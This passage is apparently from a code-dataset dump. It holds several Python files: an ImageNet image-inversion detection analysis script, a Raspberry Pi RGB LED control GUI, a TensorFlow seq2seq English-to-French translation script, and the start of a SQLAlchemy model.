i].set_title(f\"{cond} | {ttl} AUC: {roc_auc_score(y, fn):.3f}\")\n if ttl == 'Val': val_aucs[f'{cat}:{cond}'] = roc_auc_score(y, fn)\n plt.suptitle(f\"Regressions - {cat}\")\n plt.tight_layout(rect = (0, 0, 1, 0.95))\n pdf.savefig(); plt.close()\n # plt.show()\n\n weight_corrs[cat] = np.corrcoef(np.concatenate([\n opposing_weights[f'{cat}:uprt'],\n opposing_weights[f'{cat}:flip']\n ]))[1, 0]\n\n combo = opposing_weights[f'{cat}:flip'] - opposing_weights[f'{cat}:uprt']\n combined_regs[cat] = combo\n combo_val_fn = (combo * val_feat).sum(axis = 1)\n combo_auc[cat] = roc_auc_score(val_isuprt, combo_val_fn)\n\n\n fig, ax = plt.subplots(1, 1, figsize = (12, 5))\n ax.scatter(\n np.arange(len(val_aucs)), val_aucs.values(), s = 20, \n c = (['C0', 'C0', 'C4', 'C4'] * (len(val_aucs) // 4 + 1))[:len(val_aucs)])\n ax.set_xticks(np.arange(len(val_aucs)))\n ax.set_xticklabels(val_aucs.keys(), rotation = 45, horizontalalignment = 'right')\n ax.set_ylabel(\"Val AUC\")\n plt.tight_layout()\n pdf.savefig(); plt.close()\n\n fig, ax = plt.subplots(1, 1, figsize = (8, 5))\n ax.plot(\n np.arange(len(weight_corrs)), weight_corrs.values(),\n 'C0o')\n ax.set_xticks(np.arange(len(weight_corrs)))\n ax.set_xticklabels(weight_corrs.keys(), rotation = 45, horizontalalignment = 'right')\n ax.set_ylabel(\"Weight correlation\")\n ax.set_ylim(-1.1, 0.1)\n plt.tight_layout()\n pdf.savefig(); plt.close()\n\n fig, ax = plt.subplots(1, 1, figsize = (8, 5))\n ax.plot(\n np.arange(len(combo_auc)), combo_auc.values(),\n 'C0o')\n ax.set_xticks(np.arange(len(combo_auc)))\n ax.set_xticklabels(combo_auc.keys(), rotation = 45, horizontalalignment = 'right')\n ax.set_ylabel(\"Combined Regression Val AUC\")\n plt.tight_layout()\n pdf.savefig(); plt.close()\n\n\nopposing_weights = {**opposing_weights, **{f'{k}_auc':v for k,v in val_aucs.items()}}\nnp.savez(raw_weight_out, **opposing_weights)\nnp.savez(reg_out, **combined_regs)\n\nopposing_weights = np.load(raw_weight_out)\n\n\n# Form 112x112 imagenet images\n# =====================================================\n\niso_file = \"ssddata/imagenet/imagenet_iso224_flip.h5\"\nout_file = \"ssddata/imagenet/imagenet_iso112_flip.h5\"\n\niso_h5 = h5py.File(iso_file, 'r')\ncats = [c for c in iso_h5.keys() if not c.endswith('_y')]\n# cats = ['bathtub', 'bakery', 'artichoke']\n\ndownscale_ax = lambda axis, a: (\n np.moveaxis(np.moveaxis(a, axis, -1\n ).reshape(a.shape[:axis] + a.shape[axis + 1:] + (a.shape[axis] // 2, 2)\n ).mean(axis = -1),\n -1, axis))\n\nwith h5py.File(out_file, 'w') as out_h5:\n for cat in cats:\n print(f\"Category: {cat}\")\n nimg = iso_h5[cat + '_y'][...].sum()\n to_scale = iso_h5[cat][...][iso_h5[cat + '_y'][...].astype('bool')]\n scaled = downscale_ax(1, downscale_ax(2, to_scale))\n dset_img = out_h5.create_dataset(cat, scaled.shape, iso_h5[cat].dtype)\n dset_img[...] = scaled\n dset_y = out_h5.create_dataset(cat + '_y', (nimg,), np.bool_)\n dset_y[...] = True\n\n\n\n# Form composites\n# =====================================================\n\nuprt_img_file = \"data/imagenet/imagenet_iso224.h5\"\nflip_img_file = \"ssddata/imagenet/imagenet_iso224_flip.h5\"\nout_file = \"ssddata/imagenet/imagenet_flip_comp.h5\"\n\nflip_h5 = h5py.File(flip_img_file, 'r')\nuprt_h5 = h5py.File(uprt_img_file, 'r')\ncats = [c for c in flip_h5.keys() if not c.endswith('_y')]\n# cats = ['bathtub', 'bakery', 'artichoke']\n\nwith h5py.File(out_file, 'w') as out_h5:\n for cat in cats:\n print(f\"Category: {cat}\")\n n_gen = 450\n flip_start = 450\n\n flip_imgs = flip_h5[cat][:n_gen]\n uprt_imgs = uprt_h5[cat][...][uprt_h5[cat + '_y'][...].astype('bool')]\n neg_ix = np.stack([\n np.random.choice(len(uprt_imgs), 7, replace = False)\n for _ in range(n_gen)], axis = 1)\n # downscale images\n downscale_ax = lambda axis, a: (\n np.moveaxis(np.moveaxis(a, axis, -1\n ).reshape(a.shape[:axis] + a.shape[axis + 1:] + (a.shape[axis] // 2, 2)\n ).mean(axis = -1),\n -1, axis))\n flip_imgs = downscale_ax(1, downscale_ax(2, flip_imgs))\n uprt_imgs = downscale_ax(1, downscale_ax(2, uprt_imgs))\n\n # interleave positive and negative images\n pos = np.concatenate([\n np.concatenate([ flip_imgs, uprt_imgs[neg_ix[1]]], axis = 2),\n np.concatenate([uprt_imgs[neg_ix[0]], uprt_imgs[neg_ix[2]]], axis = 2)\n ], axis = 1)\n neg = np.concatenate([\n np.concatenate([uprt_imgs[neg_ix[3]], uprt_imgs[neg_ix[5]]], axis = 2),\n np.concatenate([uprt_imgs[neg_ix[4]], uprt_imgs[neg_ix[6]]], axis = 2)\n ], axis = 1)\n all_imgs = np.hstack((pos, neg)).reshape(\n (n_gen * 2, flip_imgs.shape[1] * 2, flip_imgs.shape[2] * 2, flip_imgs.shape[3]))\n gen_ys = np.array([1, 0] * n_gen, dtype = np.bool_)\n\n\n dset_img = out_h5.create_dataset(cat, all_imgs.shape, np.float32)\n dset_img[...] = all_imgs\n dset_y = out_h5.create_dataset(cat + '_y', (n_gen * 2,), np.bool_)\n dset_y[...] = gen_ys\n\n\n\n\n# Combined-regressions reconstruction plot\n# =====================================================\n\ndist_file = \"ssddata/apool/enc_ign_flipcomp.h5\" # flip_detection.md\nfocl_file = \"ssddata/apool/enc_ign_flipcomp_b4.0.h5\" # flip_detection.md\nplot_out = \"plots/runs/flip/reconstruct_112.pdf\"\n\n\nfrom plot import readouts\n\nreadout_data = readouts.readout_data(\n dist_file, focl_file,\n (0, 4, 3))\n\n\nfig, ax = plt.subplots(1, 1, figsize = (7, 5))\nreadouts.reconstructed_bhv(ax, readout_data,\n combined_regs\n)\nplt.tight_layout()\nplt.savefig(plot_out)\nplt.show()\n\n\n\n\n# TI-FC composites\n# =====================================================\n\"\"\"\nflip_tifc:\nTwo intervals of a composite; upright & flipped imgs\nOne quadrant/image will invert between the two intervals\nWhich interval has the upright copy of the inverting quadrant?\nmanyflip_tifc:\nTwo intervals of a composite; upright & flipped imgs\nSome quadrants will invert between the two intervals\nWhich interval has the upright copy of the image in a given quadrant?\nmanysrc_tifc\nTwo intervals of composites; upright & flipped imgs\nOne quadrant/image will invert between the two intervals,\n and all of the source images will change\nWhich interval has the upright copy of the inverting quadrant?\n\"\"\"\n\n\nuprt_img_file = \"ssddata/imagenet/imagenet_iso112.h5\"\nflip_img_file = \"ssddata/imagenet/imagenet_iso112_flip.h5\"\nout_file = \"ssddata/imagenet/imagenet_manysrc_tifc.h5\"\nmode = 'manysrc'\n\nflip_h5 = h5py.File(flip_img_file, 'r')\nuprt_h5 = h5py.File(uprt_img_file, 'r')\ncats = [c for c in flip_h5.keys() if not c.endswith('_y')]\n# cats = ['bathtub', 'bakery', 'artichoke']\n\nwith h5py.File(out_file, 'w') as out_h5:\n for cat in cats:\n print(f\"Category: {cat}\")\n n_gen = 450\n start = 450\n\n flip_imgs = flip_h5[cat][start:start+n_gen]\n uprt_imgs = uprt_h5[cat][start:start+n_gen]\n\n pd_ix = np.stack([ # mode : flip, manyflip, manysrc\n np.random.choice(len(uprt_imgs), 3, replace = False)\n for _ in range(n_gen)], axis = 1)\n\n if mode in ['flip', 'manyflip']:\n nd_ix = pd_ix.copy() # mode: flip, manyflip\n elif mode in ['manysrc']:\n nd_ix = np.stack([ # mode : manysrc\n np.random.choice(len(uprt_imgs), 3, replace = False)\n for _ in range(n_gen)], axis = 1)\n\n pd_flp = np.random.choice(2, [3, n_gen], replace = True)\n if mode in ['flip', 'manysrc']:\n nd_flp = pd_flp.copy() # mode: flip, manysrc\n elif mode in ['manyflip']:\n nd_flp = np.random.choice(2, [3, n_gen], replace = True) # mode :manyflip\n\n pt_ix = np.arange(n_gen) # mode : all\n if mode in ['flip', 'manyflip']:\n nt_ix = np.arange(n_gen) # mode : flip, manyflip\n elif mode in ['manysrc']:\n nt_ix = np.random.permutation(n_gen) # mode : manysrc\n\n # form uprt and flip composites\n imgs = np.stack([uprt_imgs, flip_imgs])\n pos = np.concatenate([\n np.concatenate([ uprt_imgs[pt_ix], imgs[pd_flp[1], pd_ix[1]]], axis = 2),\n np.concatenate([imgs[pd_flp[0], pd_ix[0]], imgs[pd_flp[2], pd_ix[2]]], axis = 2)\n ], axis = 1)\n neg = np.concatenate([\n np.concatenate([ flip_imgs[nt_ix], imgs[nd_flp[1], nd_ix[1]]], axis = 2),\n np.concatenate([imgs[nd_flp[0], nd_ix[0]], imgs[nd_flp[2], nd_ix[2]]], axis = 2)\n ], axis = 1)\n # interleave positive and negative images\n all_imgs = np.hstack((pos, neg)).reshape(\n (n_gen * 2, flip_imgs.shape[1] * 2, flip_imgs.shape[2] * 2, flip_imgs.shape[3]))\n all_isflipped = np.hstack((pd_flp, nd_flp)).reshape(\n (n_gen * 2, 3))\n gen_ys = np.array([1, 0] * n_gen, dtype = np.bool_)\n\n\n dset_img = out_h5.create_dataset(cat, all_imgs.shape, np.float32)\n dset_img[...] = all_imgs\n dset_y = out_h5.create_dataset(cat + '_y', (n_gen * 2,), np.bool_)\n dset_y[...] = gen_ys\n dset_flp = out_h5.create_dataset(cat + '_isflipped.meta', (n_gen * 2, 3), np.bool_)\n dset_flp[...] = all_isflipped\n\n\n\n\n# TI-FC behavior\n# =====================================================\n\ntifc_enc_file = 'ssddata/apool/enc_ign_flip_tifc.h5'\nplot_out = 'plots/runs/flip/tifc_bycategory.pdf'\nlayer = '0.4.3'\n\nenc_h5 = h5py.File(tifc_enc_file, 'r')\n\n\nfrom sklearn import metrics as skmtr\ncompose_auc = lambda pos, neg: skmtr.roc_auc_score(\n np.concatenate([\n np.ones(pos.shape[0]),\n np.zeros(neg.shape[0])]),\n np.concatenate([\n pos,\n neg]))\n\nwith PdfPages(plot_out) as pdf:\n for i_cat, cat in enumerate(cats):\n print(\"Category:\", cat)\n isuprt = enc_h5['y'][i_cat][...].astype('bool')\n uprt_enc = enc_h5[layer][i_cat][ isuprt]\n flip_enc = enc_h5[layer][i_cat][~isuprt]\n cat_coef = opposing_weights[f'{cat}:uprt']\n uprt_fn = (uprt_enc.mean(axis = (2,3)) * cat_coef).sum(axis = 1)\n flip_fn = (flip_enc.mean(axis = (2,3)) * cat_coef).sum(axis = 1)\n tifc_scores = uprt_fn - flip_fn\n\n fig, ax = plt.subplots(1, 2, figsize = (6, 3))\n ax[0].axhline(0, lw = 1, color = '.8')\n ax[0].plot(\n np.random.uniform(-0.2, 0.2, len(uprt_fn)),\n uprt_fn, 'C0o', alpha = 0.3)\n ax[0].plot(\n np.random.uniform(0.8, 1.2, len(flip_fn)),\n flip_fn, 'C3o', alpha = 0.3)\n ax[0].set_xticks([0, 1])\n ax[0].set_xticklabels([\"TL: Upright\", \"TL: Flip\"])\n ax[0].set_title(cat)\n ax[1].hist(tifc_scores)\n # ax[1].set_title(f\"Pct pos: {(tifc_scores>0).mean():.3f}\")\n ax[1].set_title(f\"AUC: {compose_auc(uprt_fn, flip_fn)}\")\n plt.tight_layout()\n pdf.savefig(); plt.close()\n\n\n\n# TI-FC reconstruct plot\n# =====================================================\n\n\ndist_file = \"ssddata/apool/enc_ign_manysrc_tifc.h5\" # flip_detection.md\nfocl_file = \"ssddata/apool/enc_ign_manysrc_tifc_b4.0.h5\" # flip_detection.md\nopposing_weights = np.load('data/models/opposed_regs_ign112_flip.npz')\n\nfrom plot import readouts\n\nsrc_tifc_readout_data = readouts.readout_data(\n dist_file, focl_file,\n (0, 4, 3))\n\n\n\ndiff_pct_correct = lambda fn_pos, fn_neg: (\n (fn_pos.mean(axis = (2, 3)).sum(axis = 1) -\n fn_neg.mean(axis = (2, 3)).sum(axis = 1)\n ) > 0).mean()\nsrc_scr_dist = []; src_scr_focl = []\nsrc_scr_fake = []; src_scr_undo = []\n# for i_cat in range(len(pair_c1)):\nfor i_cat, cat in enumerate(cats):\n # weights = regs[f'pair{i_cat}'][..., None, None]\n weights = opposing_weights[f'{cat}:uprt'][..., None, None]\n for (cond, cond_list) in [\n ('dist', src_scr_dist), ('focl', src_scr_focl),\n ('fake', src_scr_fake), ('undo', src_scr_undo)]:\n fn_pos = src_tifc_readout_data.__dict__['pos_' + cond][i_cat] * weights\n fn_neg = src_tifc_readout_data.__dict__['neg_' + cond][i_cat] * weights\n cond_list.append(diff_pct_correct(fn_pos, fn_neg))\n\nsrc_scr_dist = np.stack(src_scr_dist); src_scr_focl = np.stack(src_scr_focl)\nsrc_scr_fake = np.stack(src_scr_fake); src_scr_undo = np.stack(src_scr_undo)\n\n\nout_plot = \"plots/runs/flip/tifc_reconstruct_cls.pdf\"\nscores = dict(\n score_dist = cls_scr_dist, score_focl = cls_scr_focl,\n score_fake = cls_scr_fake, score_undo = cls_scr_undo)\n\nwith PdfPages(out_plot) as pdf:\n fig, ax = plt.subplots(1, 1, figsize = (7, 5))\n readouts.reconstructed_bhv_plot(ax, scores)\n plt.tight_layout()\n pdf.savefig()\n plt.show()\n\n\nplot_out = \"plots/runs/flip/breakout_reconstruct_cls.pdf\"\nwith PdfPages(plot_out) as pdf:\n fig, ax = plt.subplots(1, 3, figsize = (7, 3), sharey = True)\n val_aucs_arr = [val_aucs[f'pair{i}'] for i in range(len(pair_c1))]\n val_auc_rng = (0.925, 1.025)\n dist_kw = dict(color = 'k')\n focl_kw = dict(color = 'C4')\n fake_kw = dict(color = (0,0,0,0), mec = 'C4')\n undo_kw = dict(color = (0,0,0,0), mec = 'k')\n ax[0].plot(val_aucs_arr, cls_scr_dist, 'o', ms = 4, **dist_kw)\n ax[0].plot(val_aucs_arr, cls_scr_fake, 'o', ms = 4, **fake_kw)\n ax[0].set_xlim(*val_auc_rng)\n ax[0].set_ylim(-0.05, 1.05)\n ax[0].set_title(\"Dist. to Mult\")\n ax[1].plot(val_aucs_arr, cls_scr_dist, 'o', ms = 4, **dist_kw)\n ax[1].plot(val_aucs_arr, cls_scr_focl, 'o', ms = 4, **focl_kw)\n ax[1].set_xlim(*val_auc_rng)\n ax[1].set_ylim(-0.05, 1.05)\n ax[1].set_title(\"Dist. to Focl\")\n ax[2].plot([], [], 'o', ms = 4, **dist_kw, label = \"Distributed\")\n ax[2].plot(val_aucs_arr, cls_scr_focl, 'o', ms = 4, **focl_kw, label = 'Focal')\n ax[2].plot([], [], 'o', ms = 4, **fake_kw, label = 'Multipled')\n ax[2].plot(val_aucs_arr, cls_scr_undo, 'o', ms = 4, **undo_kw, label = 'Divided')\n ax[2].set_xlim(*val_auc_rng)\n ax[2].set_ylim(-0.05, 1.05)\n ax[2].legend(loc = 'center left', bbox_to_anchor = (1, 0.5), frameon = False)\n ax[2].set_title(\"Focl. to Divide\")\n ax[0].set_ylabel(\"Accuracy\")\n ax[1].set_xlabel(\"Isolated validation AUC\")\n plt.tight_layout()\n pdf.savefig()\n plt.show()\n\nplot_out = \"plots/runs/flip/breakout_reconstruct_src.pdf\"\nwith PdfPages(plot_out) as pdf:\n fig, ax = plt.subplots(1, 3, figsize = (7, 3), sharey = True)\n val_aucs_arr = [opposing_weights[f\"{cat}:uprt_auc\"] for cat in cats]\n val_auc_rng = (0.45, 1.05)\n ax[0].plot(val_aucs_arr, src_scr_dist, 'o', ms = 4, **dist_kw)\n ax[0].plot(val_aucs_arr, src_scr_fake, 'o', ms = 4, **fake_kw)\n ax[0].set_xlim(*val_auc_rng)\n ax[0].set_ylim(-0.05, 1.05)\n ax[0].set_title(\"Dist. to Mult\")\n ax[1].plot(val_aucs_arr, src_scr_dist, 'o', ms = 4, **dist_kw)\n ax[1].plot(val_aucs_arr, src_scr_focl, 'o', ms = 4, **focl_kw)\n ax[1].set_xlim(*val_auc_rng)\n ax[1].set_ylim(-0.05, 1.05)\n ax[1].set_title(\"Dist. to Focl\")\n ax[2].plot([], [], 'o', ms = 4, **dist_kw, label = \"Distributed\")\n ax[2].plot(val_aucs_arr, src_scr_focl, 'o', ms = 4, **focl_kw, label = 'Focal')\n ax[2].plot([], [], 'o', ms = 4, **fake_kw, label = 'Multipled')\n ax[2].plot(val_aucs_arr, src_scr_undo, 'o', ms = 4, **undo_kw, label = 'Divided')\n ax[2].set_xlim(*val_auc_rng)\n ax[2].set_ylim(-0.05, 1.05)\n ax[2].legend(loc = 'center left', bbox_to_anchor = (1, 0.5), frameon = False)\n ax[2].set_title(\"Focl. to Divide\")\n ax[0].set_ylabel(\"Accuracy\")\n ax[1].set_xlabel(\"Isolated validation AUC\")\n plt.tight_layout()\n pdf.savefig()\n plt.show()\n\n\n\n# TI-FC behavior change\n# =====================================================\n\"\"\"\nSort of makes sense that gain wouldn't make a difference\nin the TI-FC setup : already what's happening is that\nthe averaged representation is shifting towards `uprt`\nwhen the image changes --- there's nothing to \"overcome\".\n\nDrift diffusion model / Noise?\n\"\"\"\n\nbhv_change = np.zeros([len(cats), 2, 2])\ndist_acc = np.zeros(len(cats))\nfor i_cat, cat in enumerate(cats):\n isuprt = enc_h5['y'][i_cat][...].astype('bool')\n uprt_enc = enc_h5[layer][i_cat][ isuprt]\n flip_enc = enc_h5[layer][i_cat][~isuprt]\n cat_coef = opposing_weights[f'{cat}:uprt']\n uprt_fn_aftr = (tifc_readout_data.pos_fake[i_cat].mean(axis = (2,3)) * cat_coef).sum(axis = 1)\n flip_fn_aftr = (tifc_readout_data.neg_fake[i_cat].mean(axis = (2,3)) * cat_coef).sum(axis = 1)\n uprt_fn_befr = (tifc_readout_data.pos_dist[i_cat].mean(axis = (2,3)) * cat_coef).sum(axis = 1)\n flip_fn_befr = (tifc_readout_data.neg_dist[i_cat].mean(axis = (2,3)) * cat_coef).sum(axis = 1)\n pred_aftr = (uprt_fn_aftr - flip_fn_aftr) > 0\n pred_befr = (uprt_fn_befr - flip_fn_befr) > 0\n bhv_change[i_cat] = [\n [(pred_aftr)[ pred_befr].mean(), (~pred_aftr)[ pred_befr].mean()],\n [(pred_aftr)[~pred_befr].mean(), (~pred_aftr)[~pred_befr].mean()]]\n # bhv_change[i_cat] = [\n # [(pred_aftr & pred_befr).mean(), (~pred_aftr & pred_befr).mean()],\n # [(pred_aftr & ~pred_befr).mean(), (~pred_aftr & ~pred_befr).mean()]]\n dist_acc[i_cat] = pred_befr.mean()\n\n\nfig, ax = plt.subplots(1, 4, figsize = (10, 3), sharey = True)\nval_aucs_uprt = [val_aucs[f\"{cat}:uprt\"] for cat in cats]\nfor i, ix in enumerate([(0, 0), (0, 1), (1, 0), (1, 1)]):\n ax[i].plot(val_aucs_uprt, bhv_change[:, ix[0], ix[1]], 'ko', ms = 4)\n ax[i].set_xlim(-0.05, 1.05)\n ax[i].set_ylim(-0.05, 1.05)\n ax[i].set_title('TF'[ix[0]] + \" to \" + 'TF'[ix[1]])\nax[0].set_xlabel(\"Accuracy (Dist)\")\nax[0].set_ylabel(\"Percent shift\")\nplt.tight_layout()\nplt.show()\n\n\nfig, ax = plt.subplots(1, 4, figsize = (10, 3), sharey = True)\nfor i, ix in enumerate([(0, 0), (0, 1), (1, 0), (1, 1)]):\n ax[i].hist(bhv_change[:, ix[0], ix[1]],\n bins = np.linspace(0, 1, 30))\n ax[i].set_xlim(0, 1)\n ax[i].set_ylim(0, len(cats))\n ax[i].set_title('TF'[ix[0]] + \" to \" + 'TF'[ix[1]])\nplt.tight_layout()\nplt.show()\n\n\n\n\n\n\n\n# Classwise TIFC Composites\n# =====================================================\n\"\"\"\ncls_tifc:\nTwo intervals of composites; Banana and Greenhouse images\nAll of the quadrants will change between intervals, but only\n one will switch class\nWhich interval has the Greenhouse copy of the inverting quadrant?\n\"\"\"\n\n\niso_file = \"ssddata/imagenet/imagenet_iso112.h5\"\nout_file = \"ssddata/imagenet/imagenet_cls_tifc.h5\"\n\niso_h5 = h5py.File(iso_file, 'r')\ncats = [c for c in iso_h5.keys() if not c.endswith('_y')]\nn_gen = 450\nstart = 450\n\npair_c1 = np.arange(0, (len(cats) // 2) * 2, 2)\npair_c2 = pair_c1 + 1\n\nwith h5py.File(out_file, 'w') as out_h5:\n for i_pair, (c1, c2) in enumerate(zip(pair_c1, pair_c2)):\n print(f\"Category: pair{i_pair}\")\n c1_imgs = iso_h5[cats[c1]][start:start+n_gen]\n c2_imgs = iso_h5[cats[c2]][start:start+n_gen]\n\n d_ix = np.stack([\n np.random.choice(n_gen, [3, 2], replace = False)\n for _ in range(n_gen)], axis = 1)\n pd_ix = d_ix[:, :, 0]\n nd_ix = d_ix[:, :, 1]\n d_cls = np.random.choice(2, [3, n_gen], replace = True)\n nt_ix = np.random.permutation(n_gen)\n\n imgs = np.stack([c1_imgs, c2_imgs])\n pos = np.concatenate([\n np.concatenate([ c1_imgs, imgs[d_cls[1], pd_ix[1]]], axis = 2),\n np.concatenate([imgs[d_cls[0], pd_ix[0]], imgs[d_cls[2], pd_ix[2]]], axis = 2)\n ], axis = 1)\n neg = np.concatenate([\n np.concatenate([ c2_imgs[nt_ix], imgs[d_cls[1], nd_ix[1]]], axis = 2),\n np.concatenate([imgs[d_cls[0], nd_ix[0]], imgs[d_cls[2], nd_ix[2]]], axis = 2)\n ], axis = 1)\n # interleave positive and negative images\n all_imgs = np.hstack((pos, neg)).reshape(\n (n_gen * 2, c1_imgs.shape[1] * 2, c1_imgs.shape[2] * 2, c1_imgs.shape[3]))\n gen_ys = np.array([1, 0] * n_gen, dtype = np.bool_)\n\n dset_img = out_h5.create_dataset(f\"pair{i_pair}\", all_imgs.shape, np.float32)\n dset_img[...] = all_imgs\n dset_y = out_h5.create_dataset(f\"pair{i_pair}_y\", (n_gen * 2,), np.bool_)\n dset_y[...] = gen_ys\n dset_flp = out_h5.create_dataset(f\"pair{i_pair}_cls.meta\", (n_gen, 3), np.bool_)\n dset_flp[...] = d_cls.T\n\n\n\n# Classwise TIFC regressions\n# =====================================================\n\n\n\niso_encodings = \"ssddata/apool/enc_ign_iso112.h5\" # flip_detection.md\nreg_performance_plot = \"plots/runs/flip/reg_performance_cls.pdf\"\nreg_out = 'data/models/regs_ign112_pair.npz'\nlayer = '0.4.3'\nn_trn_each = 400\nn_val_each = 200\n\niso_h5 = h5py.File(iso_encodings, 'r')\n\nregs = {}\nval_aucs = {}\nwith PdfPages(reg_performance_plot) as pdf:\n for i_pair, (c1, c2) in enumerate(zip(pair_c1, pair_c2)):\n print(f\"Category: pair{i_pair}\")\n\n c1_y = iso_h5['y'][c1].astype('bool')\n trn_c1_feat = iso_h5[layer][c1][...][c1_y][:n_trn_each]\n val_c1_feat = iso_h5[layer][c1][...][c1_y][n_trn_each:n_trn_each + n_val_each]\n\n c2_y = iso_h5['y'][c2].astype('bool')\n trn_c2_feat = iso_h5[layer][c2][...][c2_y][:n_trn_each]\n val_c2_feat = iso_h5[layer][c2][...][c2_y][n_trn_each:n_trn_each + n_val_each]\n\n trn_x = np.hstack([trn_c1_feat, trn_c2_feat]\n ).reshape((n_trn_each*2,) + trn_c1_feat.shape[1:]\n ).mean(axis = (2, 3))\n val_x = np.hstack([val_c1_feat, val_c2_feat]\n ).reshape((n_val_each*2,) + val_c1_feat.shape[1:]\n ).mean(axis = (2, 3))\n trn_y = np.array([1, 0] * n_trn_each).astype('bool')\n val_y = np.array([1, 0] * n_val_each).astype('bool')\n\n\n reg = LogisticRegression(\n solver = 'liblinear',\n max_iter = 1000,\n fit_intercept = False)\n reg.fit(trn_x, trn_y)\n trn_fn = (reg.coef_ * trn_x).sum(axis = 1)\n val_fn = (reg.coef_ * val_x).sum(axis = 1)\n regs[f'pair{i_pair}'] = reg.coef_\n\n fig, ax = plt.subplots(1, 2, figsize = (6, 3), sharey = True)\n for i, (fn, y, ttl) in enumerate([\n (trn_fn, trn_y, 'Train'),\n (val_fn, val_y, 'Val')]):\n ax[i].plot(\n np.random.uniform(-0.1, 0.1, y.sum()), fn[y],\n 'C0o', ms = 5, alpha = 0.5)\n ax[i].plot(\n np.random.uniform(0.9, 1.1, (~y).sum()), fn[~y],\n 'C3o', ms = 5, alpha = 0.5)\n ax[i].set_title(f\"{ttl} AUC: {roc_auc_score(y, fn):.3f}\")\n if ttl == 'Val': val_aucs[f'pair{i_pair}'] = roc_auc_score(y, fn)\n plt.suptitle(f\"pair{i_pair} - {cats[c1]} v. {cats[c2]}\")\n plt.tight_layout(rect = (0, 0, 1, 0.95))\n pdf.savefig(); plt.close()\n\n\n fig, ax = plt.subplots(1, 1, figsize = (6, 3))\n ax.scatter(\n np.arange(len(val_aucs)), val_aucs.values(), s = 20, color = 'k')\n ax.set_xticks(np.arange(len(val_aucs)))\n ax.set_xticklabels(val_aucs.keys(), rotation = 90,\n horizontalalignment = 'right')\n ax.set_ylabel(\"Val AUC\")\n plt.tight_layout()\n pdf.savefig(); plt.close()\n\n\nregs = {**regs, **{f'{k}_auc':v for k,v in val_aucs.items()}}\nnp.savez(reg_out, **regs)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dbirman/attfield2","sub_path":"code/script/flip_detection.py","file_name":"flip_detection.py","file_ext":"py","file_size_in_byte":27219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17674603338","text":"from gpiozero import PWMLED\nfrom gpiozero import LED, Button\nfrom tkinter import *\nfrom tkinter import Tk, Label, Entry, Button, StringVar, IntVar\n\n\n\n\ndef switch_led():\n if position_track.get() == 0:\n print('off => on')\n position_track.set(1)\n led2.on()\n else:\n print('on => off')\n position_track.set(0)\n led2.off()\n \ndef change_color(self):\n red.value = red_slider.get()\n green.value = green_slider.get()\n blue.value = blue_slider.get()\n print(self)\n\ndef close_window():\n window.destroy()\n\nled2 = LED(16)\nred = PWMLED(23)\ngreen = PWMLED(24)\nblue = PWMLED(25)\n\nwindow = Tk()\nwindow.title('rgb led')\nwindow.geometry('300x400')\n\n\nposition_track = IntVar(window)\nposition_track.set(0)\n\nred_slider = Scale(window, from_=0, to=1, resolution=0.01, orient=HORIZONTAL, label='Red', troughcolor='red', length=200, command=change_color)\nred_slider.pack()\n\ngreen_slider = Scale(window, from_=0, to=1, resolution=0.01, orient=HORIZONTAL, label='Green', troughcolor='green', length=200, command=change_color)\ngreen_slider.pack()\n\nblue_slider = Scale(window, from_=0, to=1, resolution=0.01, orient=HORIZONTAL, label='Blue', troughcolor='blue', length=200, command=change_color)\nblue_slider.pack()\n\nclose_button = Button(window, text='close', command=close_window)\nclose_button.pack()\n\nswitch_button = Button(window, text='led', command=switch_led)\nswitch_button.pack()\n","repo_name":"jamby1100/raspberrypi-projects","sub_path":"lab3a.py","file_name":"lab3a.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20648266348","text":"import tensorflow as tf\nimport pickle\n\n# Sentence to be translated\n\ntranslate_sentence = 'he saw a old yellow truck .'\n\nbatch_size = 128\n\n\n# Load preprocessed data\n\ndef load_preprocess():\n \"\"\"\n Load the Preprocessed Training data and return them in batches of or less\n \"\"\"\n\n with open('preprocess.p', mode='rb') as in_file:\n return pickle.load(in_file)\n\n\n# Load parameters\n\ndef load_params():\n \"\"\"\n Load parameters from file\n \"\"\"\n\n with open('params.p', mode='rb') as in_file:\n return pickle.load(in_file)\n\n\n# Preprocess new sentence\n\ndef sentence_to_seq(sentence, vocab_to_int):\n \"\"\"\n Convert a sentence to a sequence of ids\n :param sentence: String\n :param vocab_to_int: Dictionary to go from the words to an id\n :return: List of word ids\n \"\"\"\n\n sentence_lower = sentence.lower()\n sentence_ids = []\n\n for word in sentence_lower.split():\n if word in vocab_to_int.keys():\n sentence_ids.append(vocab_to_int[word])\n else:\n sentence_ids.append(vocab_to_int[''])\n\n return sentence_ids\n\n\n# Load data\n\nprint('Loading preprocessed data and parameters...')\n\n_, (source_vocab_to_int,\n target_vocab_to_int), (source_int_to_vocab,\n target_int_to_vocab) = load_preprocess()\n\nload_path = load_params()\n\n\n# Translate\n\nprint('Translating...')\n\ntranslate_sentence = sentence_to_seq(translate_sentence, source_vocab_to_int)\n\nloaded_graph = tf.Graph()\n\nwith tf.Session(graph=loaded_graph) as sess:\n # Load saved model\n loader = tf.train.import_meta_graph(load_path + '.meta')\n loader.restore(sess, load_path)\n\n input_data = loaded_graph.get_tensor_by_name('input:0')\n logits = loaded_graph.get_tensor_by_name('predictions:0')\n target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')\n source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')\n keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')\n\n translate_logits = sess.run(logits, {input_data: [translate_sentence]*batch_size,\n target_sequence_length: [len(translate_sentence)*2]*batch_size,\n source_sequence_length: [len(translate_sentence)]*batch_size,\n keep_prob: 1.0})[0]\n\nprint('Input')\nprint(' Word Ids: {}'.format([i for i in translate_sentence]))\nprint(' English Words: {}'.format([source_int_to_vocab[i] for i in translate_sentence]))\n\nprint('\\nPrediction')\nprint(' Word Ids: {}'.format([i for i in translate_logits]))\nprint(' French Words: {}'.format(\" \".join([target_int_to_vocab[i] for i in translate_logits])))\n","repo_name":"LeanderLXZ/language-translation-seq2seq","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26529706644","text":"from sql_alchemy import database\nfrom datetime import datetime\n\nclass SaleModel(database.Model):\n 